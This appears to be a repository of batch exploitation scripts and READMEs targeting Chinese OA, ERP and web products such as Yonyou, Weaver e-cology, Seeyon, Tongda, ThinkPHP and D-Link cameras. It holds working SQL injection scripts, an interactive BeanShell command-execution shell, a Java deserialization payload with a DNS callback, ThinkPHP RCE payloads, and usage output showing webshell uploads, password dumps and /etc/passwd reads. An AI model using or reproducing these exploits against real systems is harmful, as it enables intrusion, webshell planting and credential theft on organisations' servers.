├── D-Link_DCS系列监控 ├── url.txt ├── README.md ├── exp.py └── poc.py ├── README.md ├── 用友OA ├── 用友U8_OA_SQL注入 │ ├── url.txt │ ├── exp.py │ ├── README.md │ ├── getshell_exp.py │ ├── poc.py │ └── getshell_poc.py ├── 用友GRP-U8_SQL注入 │ ├── README.md │ ├── GRP-U8_SQLinjectioin_POC.py │ └── GRP-U8_SQLinjectioin_EXP.py ├── 用友ERP-NC_目录遍历 │ ├── README.md │ ├── exp.py │ └── poc.py └── 用友NC_反序列化RCE │ └── poc.py ├── 启莱OA └── 启莱OA_treelist.aspx_SQL注入 │ ├── url.txt │ ├── README.md │ ├── exp.py │ └── poc.py ├── 蓝凌OA └── 蓝凌OA_custom.jsp 任意文件读取漏洞 │ ├── url.txt │ ├── README.md │ ├── exp.py │ └── poc.py ├── 泛微OA ├── E-Cology_WorkflowServiceXml_RCE │ ├── url.txt │ ├── main │ │ ├── MacOS │ │ │ └── main │ │ ├── linux │ │ │ └── main │ │ ├── windows │ │ │ └── main.exe │ │ └── README.md │ └── README.md ├── e-cology-OA-SQL │ └── e-cology-OA-SQL.py ├── 泛微OA_V8_SQL注入 │ ├── README.md │ ├── weaverSQL_exp.py │ └── weaverSQL.py ├── ecology_test │ ├── ecology_rce.py │ ├── ecology_scan.py │ ├── Weaver-Ecology-OA_RCE-EXP.py │ ├── ecology_sql.py │ └── ecology_test.py ├── RCE │ └── e-cology-poc.py └── 泛微OA_V9_任意文件上传 │ ├── exp.py │ ├── 泛微OA_sql+upload.py │ └── poc.py ├── seeyon ├── 致远OA文件上传漏洞利用工具 │ ├── seeyon_exp_v2.jar │ └── README.md ├── 致远OA_Session泄露_任意文件上传漏洞 │ ├── README.md │ ├── exp.py │ └── poc.py ├── 致远OA组合getshell.py ├── 致远A8任意文件写入漏洞_getshell_exp │ └── 致远A8任意文件写入漏洞_getshell_exp.py └── seeyon_ajax_exp │ └── seeyon_upload_exp.py ├── ThinkAdmin ├── encode.php └── ThinkAdminScan.py ├── zentao-getshell ├── README.md └── exp.py ├── thinkphp5 ├── thinkphp5_rce │ ├── README.md │ └── tp5_rce.py ├── thinkphp5.0.x_RCE │ ├── README.md │ └── tp5-rce.py └── tp5-getshell │ ├── README.md │ └── tp5-getshell.py ├── tongdaOA ├── 前台任意用户登录 │ ├── README.md │ └── 通达OA前台任意用户登录漏洞.py └── 通达OA命令执行漏洞 │ └── tongda_rce.py ├── Drupal ├── CVE-2018-7600-Drupal7 │ ├── README.md │ └── CVE-2018-7600-Drupal7-EXP.py └── CVE-2019-6340 │ ├── CVE-2019-6340.py │ └── README.md ├── EYouMail ├── README.md └── EYouMailRCE.py ├── ThinkCMF ├── 
README.md └── ThinkCMF_getshell_exp.py ├── Jellyfin_任意文件读取漏洞 └── poc.py ├── 和信创天云桌面系统 ├── exp.py └── poc.py ├── 智慧校园管理系统 └── exp.py ├── 帆软OA ├── 帆软OA_V8_任意文件读取 │ └── poc.py └── 帆软OA_V9getshell │ └── poc.py ├── 亿赛通 └── 电子文档安全管理系统_dataimport_远程命令执行漏洞.py └── Redis-Getshell └── Redis-Getshell.py /D-Link_DCS系列监控/url.txt: -------------------------------------------------------------------------------- 1 | http://www.xxx.com 2 | xxx.xxx.xxx.xxx:8080 3 | www.xxx.com 4 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Exploit_Scripts 2 | Exploit_Scripts 3 | ## 自己修改的一些可以批量利用的EXP脚本,实时更新! 4 | -------------------------------------------------------------------------------- /用友OA/用友U8_OA_SQL注入/url.txt: -------------------------------------------------------------------------------- 1 | http://www.xxx.com 2 | xxx.xxx.xxx.xxx:8080 3 | www.xxx.com 4 | -------------------------------------------------------------------------------- /启莱OA/启莱OA_treelist.aspx_SQL注入/url.txt: -------------------------------------------------------------------------------- 1 | http://www.xxx.com 2 | xxx.xxx.xxx.xxx:8080 3 | www.xxx.com 4 | -------------------------------------------------------------------------------- /蓝凌OA/蓝凌OA_custom.jsp 任意文件读取漏洞/url.txt: -------------------------------------------------------------------------------- 1 | http://www.xxx.com 2 | xxx.xxx.xxx.xxx:8080 3 | www.xxx.com 4 | -------------------------------------------------------------------------------- /泛微OA/E-Cology_WorkflowServiceXml_RCE/url.txt: -------------------------------------------------------------------------------- 1 | http://www.xxx.com 2 | xxx.xxx.xxx.xxx:8080 3 | www.xxx.com 4 | -------------------------------------------------------------------------------- /seeyon/致远OA文件上传漏洞利用工具/seeyon_exp_v2.jar: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/H4ckTh3W0r1d/Exploit_Scripts/HEAD/seeyon/致远OA文件上传漏洞利用工具/seeyon_exp_v2.jar -------------------------------------------------------------------------------- /泛微OA/E-Cology_WorkflowServiceXml_RCE/main/MacOS/main: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/H4ckTh3W0r1d/Exploit_Scripts/HEAD/泛微OA/E-Cology_WorkflowServiceXml_RCE/main/MacOS/main -------------------------------------------------------------------------------- /泛微OA/E-Cology_WorkflowServiceXml_RCE/main/linux/main: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/H4ckTh3W0r1d/Exploit_Scripts/HEAD/泛微OA/E-Cology_WorkflowServiceXml_RCE/main/linux/main -------------------------------------------------------------------------------- /泛微OA/E-Cology_WorkflowServiceXml_RCE/main/windows/main.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/H4ckTh3W0r1d/Exploit_Scripts/HEAD/泛微OA/E-Cology_WorkflowServiceXml_RCE/main/windows/main.exe -------------------------------------------------------------------------------- /ThinkAdmin/encode.php: -------------------------------------------------------------------------------- 1 | 8 | -------------------------------------------------------------------------------- /zentao-getshell/README.md: -------------------------------------------------------------------------------- 1 | # zentao-getshell 禅道8.2 - 9.2.1前台Getshell 2 | ## Python Usage 3 | 4 | `python exp.py http://127.0.0.1:81/ jas502n.php` 5 | 6 | ![](./zentao.jpg) 7 | 8 | 9 | ![](./zentao.gif) 10 | 11 | -------------------------------------------------------------------------------- /thinkphp5/thinkphp5_rce/README.md: -------------------------------------------------------------------------------- 1 | # Introduction: 2 | 3 | 近日,thinkphp团队发布了版本更新,其中修复了一处远程代码执行漏洞,可直接getshell,影响范围:v5.x < 
5.1.31,<= 5.0.23 4 | 5 | # Usage: 6 | 7 | python tp5_rce.py url 8 | 9 | # Screenshot: 10 | 11 | ![](./1.png) 12 | -------------------------------------------------------------------------------- /tongdaOA/前台任意用户登录/README.md: -------------------------------------------------------------------------------- 1 | # TongDaOA-Fake-User 2 | 通达OA 前台任意用户登录漏洞 3 | 4 | **仅供安全研究,禁止非法利用!** 5 | 6 | # 使用方法 7 | 1. python3 poc.py -v 版本 -url url 8 | 2. 运行并获取到可用的SESSIONID 9 | 3. 替换浏览器Cookie中的SESSIONID即可实现登录为admin 10 | 11 | # 影响范围 12 | 13 | **通达OA2017、V11.X 13 | 14 | 为了防止你们说我水,顺便丢一个单目标的EXP 15 | 16 | ##### 本脚本仅用于授权测试,请勿用于非法用途,请遵守游戏规则。 17 | -------------------------------------------------------------------------------- /EYouMail/README.md: -------------------------------------------------------------------------------- 1 | ## Usage: EYouMailRCE.py [OPTIONS] 2 | 3 | ### Options: 4 | -u, --url TEXT Target URL,对单一目标检测; Example:python3 EYouMailRCE.py -u 5 | https://ip:port 6 | 7 | -f, --file TEXT Target File,对批量目标检测; Example:python3 EYouMailRCE.py -f 8 | ip.txt 9 | 10 | -c, --cmd TEXT Target command,命令执行; Example: python3 EYouMailRCE.py -cmd 11 | id 12 | 13 | --help Show this message and exit. 
14 | -------------------------------------------------------------------------------- /ThinkCMF/README.md: -------------------------------------------------------------------------------- 1 | # ThinkCMF_getshell 框架上的任意内容包含漏洞 2 | 3 | 远程攻击者在无需任何权限情况下,通过构造特定的请求包即可在远程服务器上执行任意代码。 4 | 5 | ## python usage: 6 | python3 ThinkCMF_getshell_exp.py -u http://127.0.0.1:1111 单个url测试 7 | 8 | python3 ThinkCMF_getshell_exp.py -f url.txt 批量检测 9 | 10 | ## 修复方法 11 | 将 12 | `HomebaseController.class.php` 和 `AdminbaseController.class.php` 类中 `display` 和 `fetch` 函数的修饰符改为 `protected` 13 | 14 | ## 免责声明 15 | 16 | 由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。 17 | -------------------------------------------------------------------------------- /泛微OA/E-Cology_WorkflowServiceXml_RCE/main/README.md: -------------------------------------------------------------------------------- 1 | # 批量检测脚本 2 | 3 | ## windows 4 | ``` 5 | main.exe -h 6 | 使用说明: 7 | 执行命令:main.exe -u http://127.0.0.1:8080 -c whoami 8 | 批量检测:main.exe -l url.txt 9 | ``` 10 | ## linux 11 | ``` 12 | main -h 13 | 使用说明: 14 | 执行命令:./main -u http://127.0.0.1:8080 -c whoami 15 | 批量检测:./main -l url.txt 16 | ``` 17 | 18 | ## MacOS 19 | 20 | ``` 21 | main -h 22 | 使用说明: 23 | 执行命令:./main -u http://127.0.0.1:8080 -c whoami 24 | 批量检测:./main -l url.txt 25 | ``` 26 | -------------------------------------------------------------------------------- /thinkphp5/thinkphp5.0.x_RCE/README.md: -------------------------------------------------------------------------------- 1 | # thinkphp5.0.x_RCE 2 | thinkphp5远程代码执行两种版本的漏洞利用脚本 3 | 4 | 1.路由控制不严谨导致的RCE 5 | 6 | 影响版本:5.0.x<5.0.23 && 5.1.x<5.1.31 7 | 8 | payload:/index.php/?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami 9 | 10 | 2.Request中的变量覆盖导致RCE 11 | 12 | 13 | 影响版本:5.0.0~5.0.23 14 | 15 | payload:index.php?s=captcha 16 | 17 | (POST):_method=__construct&filter[]=system&method=get&get[]=whoami || 
_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=whoami 18 | 19 | 20 | 参数: 21 | 22 | -h 帮助 23 | 24 | -u 指定URL进行检测 25 | 26 | -r 批量检测 27 | 28 | -t 设置线程 29 | 30 | --shell getshell 31 | 32 | example:python3 tp5-rce.py -u http://tp5.com 33 | -------------------------------------------------------------------------------- /泛微OA/e-cology-OA-SQL/e-cology-OA-SQL.py: -------------------------------------------------------------------------------- 1 | import requests,sys 2 | from requests.packages.urllib3.exceptions import InsecureRequestWarning 3 | # 禁用安全请求警告 4 | requests.packages.urllib3.disable_warnings(InsecureRequestWarning) 5 | 6 | def poc(url): 7 | url = url + '/mobile/browser/WorkflowCenterTreeData.jsp?node=wftype_1&scope=2333' 8 | headers = { 'User-Agent': "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)"} 9 | payload = "formids=11111111111)))%0a%0dunion select NULL,value from v$parameter order by (((1" 10 | r = requests.post(url=url,data=payload,verify=False) 11 | #print(r.text) 12 | if "[]" in r.text: 13 | print("No vul") 14 | else: 15 | print("yep,you discover the vul") 16 | 17 | if __name__ == '__main__': 18 | url = sys.argv[1] 19 | poc(url) 20 | -------------------------------------------------------------------------------- /启莱OA/启莱OA_treelist.aspx_SQL注入/README.md: -------------------------------------------------------------------------------- 1 | # 启莱OA treelist.aspx SQL注入漏洞 2 | 3 | ## 使用方法 4 | 5 | ### 1.批量url检测 6 | 7 | url.txt格式如下: 8 | 9 | ``` 10 | http://www.xxx.com 11 | xxx.xxx.xxx.xxx:8080 12 | www.xxx.com 13 | ``` 14 | 15 | #### 漏洞验证脚本 16 | ``` 17 | python3 poc.py 18 | +------------------------------------------ 19 | + Version: 启莱OA treelist.aspx SQL注入漏洞 20 | + 使用格式: python3 poc.py 21 | + 文件名: url.txt 22 | +------------------------------------------ 23 | 请输入需要检测的文件名:url.txt 24 | ``` 25 | 26 | 27 | ### 2.单个url检测 28 | 29 | #### 漏洞验证脚本 30 | 31 | ``` 32 | python3 exp.py 33 | 
+------------------------------------------ 34 | + Version: 启莱OA treelist.aspx SQL注入漏洞 35 | + 使用格式: python3 exp.py 36 | + url地址: http://xxx.xxx.xxx.xxx 37 | +------------------------------------------ 38 | 请输入需要检测的url:http://xxx.xxx.xxx.xxx/ 39 | 请输入需要执行的sql语句:select db_name() 40 | [+]目标 http://xxx.xxx.xxx.xxx/ 存在SQL注入漏洞 41 | [+]响应为: ['xxxxxx'] 42 | ``` 43 | -------------------------------------------------------------------------------- /泛微OA/泛微OA_V8_SQL注入/README.md: -------------------------------------------------------------------------------- 1 | # 泛微OA_V8_SQL注入 2 | 3 | ## 使用方法 4 | 5 | ### 1.批量url检测 6 | 7 | url.txt格式如下: 8 | 9 | ``` 10 | http://www.xxx.com 11 | xxx.xxx.xxx.xxx:8080 12 | www.xxx.com 13 | ``` 14 | 15 | ``` 16 | python3 weaverSQL.py 17 | [-------------------------------------------------] 18 | [------------ 泛微OA V8 SQL注入 -----------] 19 | [-------- usage:python3 weaverSQL.py ------] 20 | [-------------------------------------------------] 21 | 请输入需要测试的文件名: url.txt 22 | ``` 23 | 24 | ### 2.单个url检测 25 | ``` 26 | python3 weaverSQL_exp.py 27 | [----------------------------------------- --------] 28 | [------------ 泛微OA V8 SQL注入 ---------------] 29 | [-------- usage:python3 weaverSQL_exp.py ------] 30 | [------------------------------------------- ------] 31 | 请输入需要测试url地址: http://www.xxx.com/ 32 | [+]目标系统: http://www.xxx.com/ 存在SQL注入! 33 | [+] 正在查询sysadmin密码信息....... 
34 | [+]用户: sysadmin 密码MD5: xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx 35 | ``` 36 | -------------------------------------------------------------------------------- /D-Link_DCS系列监控/README.md: -------------------------------------------------------------------------------- 1 | # D-Link DCS系列监控 账号密码信息泄露 CVE-2020-25078 2 | 3 | ## 使用方法 4 | 5 | ### 1.批量url检测 6 | 7 | url.txt格式如下: 8 | 9 | ``` 10 | http://www.xxx.com 11 | xxx.xxx.xxx.xxx:8080 12 | www.xxx.com 13 | ``` 14 | 15 | #### 漏洞验证脚本 16 | ``` 17 | python3 poc.py 18 | +------------------------------------------ 19 | + Version: D-Link DCS系列监控 账号密码信息泄露 CVE-2020-25078 20 | + 使用格式: python3 poc.py 21 | + 文件名: url.txt 22 | +------------------------------------------ 23 | 请输入需要检测的文件名:url.txt 24 | ``` 25 | 26 | 27 | ### 2.单个url检测 28 | 29 | #### 漏洞验证脚本 30 | 31 | ``` 32 | python3 exp.py 33 | +------------------------------------------ 34 | + Title: D-Link DCS系列监控 账号密码信息泄露 CVE-2020-25078 35 | + 使用格式: python3 exp.py 36 | + Url: http://xxx.xxx.xxx.xxx 37 | +------------------------------------------ 38 | 请输入需要检测的url:https://xxx.xxx.xxx.xxx 39 | [+] 正在请求 https://xxx.xxx.xxx.xxx/config/getuser?index=0 40 | [+] 获取用户名密码: 41 | name=admin 42 | pass=xxxxxx 43 | ``` 44 | -------------------------------------------------------------------------------- /seeyon/致远OA_Session泄露_任意文件上传漏洞/README.md: -------------------------------------------------------------------------------- 1 | # 致远OA Session泄露 任意文件上传漏洞 2 | 3 | ## 使用方法 4 | 5 | ### 1.批量url检测 6 | 7 | url.txt格式如下: 8 | 9 | ``` 10 | http://www.xxx.com 11 | xxx.xxx.xxx.xxx:8080 12 | www.xxx.com 13 | ```` 14 | 15 | ``` 16 | python3 poc.py 17 | +--------------------------------------------------- 18 | + Version: 致远OA Session泄露 任意文件上传漏洞 19 | + 使用格式: python3 poc.py 20 | + 文件名: url.txt 21 | +--------------------------------------------------- 22 | 请输入需要检测的文件名:url.txt 23 | ``` 24 | 25 | ### 2.单个url检测 26 | ``` 27 | python3 exp.py 28 | +--------------------------------------------------- 29 | + Version: 致远OA 
Session泄露 任意文件上传漏洞 30 | + 使用格式: python3 poc.py 31 | + url: http://xxx.xxx.xxx.xxx 32 | +--------------------------------------------------- 33 | 请输入需要检测的url:http://xxx.xxx.xxx.xxx 34 | [+]目标 http://xxx.xxx.xxx.xxx解压文件成功.... 35 | [+]目标 http://xxx.xxx.xxx.xxx 被上传冰蝎木马: http://xxx.xxx.xxx.xxx/seeyon/common/designer/pageLayout/2RpOboI1.jsp 36 | [+]冰蝎密码: bxmm 37 | ``` 38 | -------------------------------------------------------------------------------- /泛微OA/E-Cology_WorkflowServiceXml_RCE/README.md: -------------------------------------------------------------------------------- 1 | # 泛微E-Cology WorkflowServiceXml RCE 2 | 3 | ## 使用方法 4 | 5 | ### 1.批量url检测 6 | 7 | url.txt格式如下: 8 | 9 | ``` 10 | http://www.xxx.com 11 | xxx.xxx.xxx.xxx:8080 12 | www.xxx.com 13 | ``` 14 | 15 | #### 漏洞验证脚本 16 | ``` 17 | python3 poc.py 18 | +------------------------------------------ 19 | + Version: 泛微E-Cology WorkflowServiceXml RCE 20 | + 使用格式: python3 poc.py 21 | + 文件名: url.txt 22 | +------------------------------------------ 23 | 请输入需要检测的文件名:url.txt 24 | ``` 25 | 26 | 27 | ### 2.单个url检测 28 | 29 | #### 漏洞验证脚本 30 | 31 | ``` 32 | python3 exp.py 33 | +------------------------------------------ 34 | + Version: 泛微E-Cology WorkflowServiceXml RCE 35 | + 使用格式: python3 exp.py 36 | + Url地址: http://xxx.xxx.xxx.xxx 37 | +------------------------------------------ 38 | 请输入需要检测的url:http://xxx.xxx.xxx.xxx 39 | 请输入需要执行的命令:whoami 40 | [+] 目标 http://xxx.xxx.xxx.xxx 存在RCE漏洞 41 | [+] 响应为: 42 | powered by potatso nt authority\system 43 | ``` 44 | -------------------------------------------------------------------------------- /蓝凌OA/蓝凌OA_custom.jsp 任意文件读取漏洞/README.md: -------------------------------------------------------------------------------- 1 | # 蓝凌OA_custom.jsp 任意文件读取漏洞 2 | 3 | ## 使用方法 4 | 5 | ### 1.批量url检测 6 | 7 | url.txt格式如下: 8 | 9 | ``` 10 | http://www.xxx.com 11 | xxx.xxx.xxx.xxx:8080 12 | www.xxx.com 13 | ``` 14 | 15 | #### 漏洞验证脚本 16 | ``` 17 | python3 poc.py 18 | 
+------------------------------------------ 19 | + Version: 蓝凌OA_custom.jsp 任意文件读取漏洞 20 | + 使用格式: python3 poc.py 21 | + 文件名: url.txt 22 | +------------------------------------------ 23 | 请输入需要检测的文件名:url.txt 24 | ``` 25 | 26 | 27 | ### 2.单个url检测 28 | 29 | #### 漏洞验证脚本 30 | 31 | ``` 32 | python3 exp.py 33 | +------------------------------------------ 34 | + Version: 蓝凌OA 任意文件读取漏洞 35 | + 使用格式: python3 exp.py 36 | + Url: http://xxx.xxx.xxx.xxx 37 | +------------------------------------------ 38 | 请输入需要检测的url:http://xxx.xxx.xxx.xxx 39 | 请输入需要读取的文件根路径+文件名(如:/etc/passwd):/etc/passwd 40 | [+] 正在请求 http://xxx.xxx.xxx.xxx/sys/ui/extend/varkind/custom.jsp 41 | [+] 成功读取/etc/passwd 42 | [+] 响应为: 43 | 44 | root:x:0:0:root:/root:/bin/bash 45 | ...... 46 | ``` 47 | -------------------------------------------------------------------------------- /用友OA/用友ERP-NC_目录遍历/README.md: -------------------------------------------------------------------------------- 1 | # 用友ERP-NC目录遍历及任意文件读取 2 | 3 | ## 漏洞简介 4 | 5 | 用友ERP-NC 存在目录遍历漏洞,攻击者可以通过目录遍历获取敏感文件信息 6 | 7 | ## 漏洞影响 8 | 9 | 用友ERP-NC 10 | 11 | ## POC 12 | 13 | ``` 14 | /NCFindWeb?service=IPreAlertConfigService&filename= 15 | /NCFindWeb?service=IPreAlertConfigService&filename=filename 16 | ``` 17 | 18 | ## 脚本使用 19 | 20 | ### 单个URL检测 21 | ``` 22 | Usage: exp.py [OPTIONS] 23 | 24 | Options: 25 | -u, --url TEXT 目标url 26 | -f, --filename TEXT 读取文件的名字 27 | --help Show this message and exit. 
28 | ``` 29 | 30 | **目录遍历:** 31 | 32 | ```bash 33 | python3 exp.py --url http://127.0.0.1 34 | ``` 35 | 36 | **任意文件读取:** 37 | 38 | ```bash 39 | python3 exp.py --url http://127.0.0.1 --filename login.jsp 40 | ``` 41 | 42 | 读取文件内容时,可以通过先目录遍历获取文件路径,读取文件内容时,将文件路径传递给filename 参数 43 | 44 | ### 批量检测 45 | 46 | url.txt格式如下: 47 | 48 | ``` 49 | http://www.xxx.com 50 | xxx.xxx.xxx.xxx:8080 51 | www.xxx.com 52 | ``` 53 | 54 | ``` 55 | python3 poc.py 56 | +------------------------------------------ 57 | + Version: 用友ERP-NC 目录遍历漏洞 58 | + 使用格式: python3 poc.py 59 | + 文件名: url.txt 60 | +------------------------------------------ 61 | 请输入需要检测的文件名:url.txt 62 | ``` 63 | 结果会保存到success.txt文件中。 64 | -------------------------------------------------------------------------------- /用友OA/用友GRP-U8_SQL注入/GRP-U8_SQLinjectioin_POC.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python2 2 | #coding:utf-8 3 | import re 4 | import requests 5 | import sys 6 | reload(sys) 7 | sys.setdefaultencoding('utf-8') 8 | if len(sys.argv) != 3: 9 | print "Usage: python poc.py url sql" 10 | sys.exit(1) 11 | url = sys.argv[1] 12 | sql = sys.argv[2] 13 | headers = { 14 | "User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36", 15 | "Content-Type":"application/x-www-form-urlencoded", 16 | } 17 | def poc(url,sql): 18 | url = url + '/Proxy' 19 | print url 20 | data = 'cVer=9.8.0&dp=XMLAS_DataRequestProviderNameDataSetProviderDataData'+sql+'' 21 | res = requests.post(url,headers=headers,data=data) 22 | res = res.text 23 | result_row = r'' 21 | res = requests.post(url,headers=headers,data=data) 22 | res = res.text 23 | result_row = r'' 24 | ROW = re.findall(result_row,res,re.S | re.M) 25 | print '命令执行成功!' 
26 | for i in range(len(ROW)): 27 | print ROW[i] 28 | if __name__ == "__main__": 29 | exp(sys.argv[1],sys.argv[2]) 30 | -------------------------------------------------------------------------------- /泛微OA/ecology_test/ecology_rce.py: -------------------------------------------------------------------------------- 1 | import urllib3 2 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) 3 | import requests, sys 4 | 5 | print ''' 6 | -------------------------------------- 7 | BeanShell test script by LuckyEast >_< 8 | -------------------------------------- 9 | ''' 10 | 11 | headers = { 12 | 'Content-Type': 'text/xml; charset=utf-8', 13 | 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 14 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0', 15 | 'Cache-Control': 'max-age=0', 16 | 'Content-Type': 'application/x-www-form-urlencoded', 17 | 'Upgrade-Insecure-Requests': '1', 18 | 'Content-Length': '578' 19 | } 20 | 21 | url = '/weaver/bsh.servlet.BshServlet' 22 | 23 | 24 | def test(target): 25 | while 1: 26 | 27 | cmd = raw_input('\n>>>Command= ') 28 | if cmd == 'exit': 29 | break 30 | else: 31 | test_url = target + url 32 | poc = 'bsh.script=\u0065\u0078\u0065\u0063("cmd.exe /c %s");&bsh.servlet.output=raw'% cmd 33 | rsp = requests.post(url=test_url, data=poc, headers=headers, verify=False, timeout=5) 34 | text = rsp.text 35 | print text 36 | 37 | if __name__ == "__main__": 38 | target = sys.argv[1] 39 | test(target) 40 | -------------------------------------------------------------------------------- /用友OA/用友ERP-NC_目录遍历/exp.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import click 3 | import urllib3 4 | import click 5 | 6 | 7 | requests.packages.urllib3.disable_warnings() 8 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) 9 | 10 | 11 | def info(): 12 | 
print('+------------------------------------------') 13 | print('+ \033[34mVersion: 用友ERP-NC目录遍历 \033[0m') 14 | print('+ \033[36m使用格式: python3 exp.py --help \033[0m') 15 | print('+------------------------------------------') 16 | 17 | 18 | def scan(url): 19 | uri = "/NCFindWeb?service=IPreAlertConfigService&filename=" 20 | targeturl = url + uri 21 | rep = requests.get(targeturl) 22 | print(rep.text) 23 | 24 | def readfile(url, filename): 25 | uri = "/NCFindWeb?service=IPreAlertConfigService&filename=" + filename 26 | targeturl = url + uri 27 | rep = requests.get(targeturl) 28 | print(rep.text) 29 | 30 | 31 | @click.command() 32 | @click.option("-u", "--url", help='目标url') 33 | @click.option("-f", "--filename", help="读取文件的名字") 34 | def main(url, filename): 35 | info() 36 | if url != None and filename == None: 37 | scan(str(url)) 38 | elif url != None and filename != None: 39 | readfile(str(url), filename) 40 | else: 41 | print("python3 exp.py --help") 42 | 43 | if __name__ == '__main__': 44 | main() 45 | -------------------------------------------------------------------------------- /用友OA/用友NC_反序列化RCE/poc.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import threadpool 3 | import urllib3 4 | import sys 5 | import base64 6 | ip = "" 7 | dnslog = "\x6e\x6b\x6e\x69\x69\x6b\x2e\x63\x65\x79\x65\x2e\x69\x6f" #dnslog把字符串转16进制替换该段,测试用的ceye.io可以回显 8 | data = 
"\xac\xed\x00\x05\x73\x72\x00\x11\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x48\x61\x73\x68\x4d\x61\x70\x05\x07\xda\xc1\xc3\x16\x60\xd1\x03\x00\x02\x46\x00\x0a\x6c\x6f\x61\x64\x46\x61\x63\x74\x6f\x72\x49\x00\x09\x74\x68\x72\x65\x73\x68\x6f\x6c\x64\x78\x70\x3f\x40\x00\x00\x00\x00\x00\x0c\x77\x08\x00\x00\x00\x10\x00\x00\x00\x01\x73\x72\x00\x0c\x6a\x61\x76\x61\x2e\x6e\x65\x74\x2e\x55\x52\x4c\x96\x25\x37\x36\x1a\xfc\xe4\x72\x03\x00\x07\x49\x00\x08\x68\x61\x73\x68\x43\x6f\x64\x65\x49\x00\x04\x70\x6f\x72\x74\x4c\x00\x09\x61\x75\x74\x68\x6f\x72\x69\x74\x79\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x4c\x00\x04\x66\x69\x6c\x65\x71\x00\x7e\x00\x03\x4c\x00\x04\x68\x6f\x73\x74\x71\x00\x7e\x00\x03\x4c\x00\x08\x70\x72\x6f\x74\x6f\x63\x6f\x6c\x71\x00\x7e\x00\x03\x4c\x00\x03\x72\x65\x66\x71\x00\x7e\x00\x03\x78\x70\xff\xff\xff\xff\x00\x00\x00\x50\x74\x00\x11"+dnslog+"\x3a\x38\x30\x74\x00\x00\x74\x00\x0e"+dnslog+"\x74\x00\x04\x68\x74\x74\x70\x70\x78\x74\x00\x18\x68\x74\x74\x70\x3a\x2f\x2f"+dnslog+"\x3a\x38\x30\x78" 9 | uploadHeader={"User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"} 10 | req = requests.post("http://"+ip+"/service/~xbrl/XbrlPersistenceServlet", headers=uploadHeader, verify=False, data=data, timeout=25) 11 | print (req.text) 12 | -------------------------------------------------------------------------------- /用友OA/用友U8_OA_SQL注入/exp.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import sys 3 | import random 4 | import re 5 | from requests.packages.urllib3.exceptions import InsecureRequestWarning 6 | 7 | def title(): 8 | print('+------------------------------------------') 9 | print('+ \033[34mVersion: 用友 U8 OA test.jsp SQL注入漏洞 \033[0m') 10 | print('+ \033[36m使用格式: python3 exp.py \033[0m') 11 | print('+ \033[36murl地址: http://xxx.xxx.xxx.xxx \033[0m') 12 | 
print('+------------------------------------------') 13 | 14 | def POC_1(target_url): 15 | vuln_url = target_url + "/yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20md5(1))" 16 | headers = { 17 | "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36", 18 | } 19 | try: 20 | requests.packages.urllib3.disable_warnings(InsecureRequestWarning) 21 | response = requests.get(url=vuln_url, headers=headers, verify=False, timeout=5) 22 | if "c4ca4238a0b923820dcc509a6f75849b" in response.text and response.status_code == 200: 23 | print("\033[32m[+]目标 {} 存在漏洞 \n[+] 响应地址: {} \033[0m".format(target_url, vuln_url)) 24 | else: 25 | print("\033[31m[x]目标 {} 不存在漏洞 \033[0m".format(target_url)) 26 | except Exception as e: 27 | print("\033[31m[x]目标 {} 请求失败 \033[0m".format(target_url)) 28 | 29 | if __name__ == '__main__': 30 | title() 31 | target_url = str(input("\033[35m请输入需要检测的url:\033[0m")) 32 | POC_1(target_url) 33 | -------------------------------------------------------------------------------- /用友OA/用友U8_OA_SQL注入/README.md: -------------------------------------------------------------------------------- 1 | # 用友 U8 OA test.jsp SQL注入漏洞 2 | 3 | ## 使用方法 4 | 5 | ### 1.批量url检测 6 | 7 | url.txt格式如下: 8 | 9 | ``` 10 | http://www.xxx.com 11 | xxx.xxx.xxx.xxx:8080 12 | www.xxx.com 13 | ``` 14 | 15 | #### 漏洞验证脚本 16 | ``` 17 | python3 poc.py 18 | +------------------------------------------ 19 | + Version: 用友 U8 OA test.jsp SQL注入漏洞 20 | + 使用格式: python3 poc.py 21 | + 文件名: url.txt 22 | +------------------------------------------ 23 | 请输入需要检测的文件名:url.txt 24 | ``` 25 | 26 | #### 漏洞利用(getshell)脚本 27 | 28 | ``` 29 | python3 getshell_poc.py 30 | +------------------------------------------ 31 | + Version: 用友 U8 OA test.jsp SQL注入漏洞 32 | + 使用格式: python3 getshell_poc.py 33 | + 文件名: url.txt 34 | +------------------------------------------ 35 | 请输入需要检测的文件名:url.txt 36 | ``` 37 | 38 | ### 2.单个url检测 39 | 40 | #### 漏洞验证脚本 41 | 42 | 
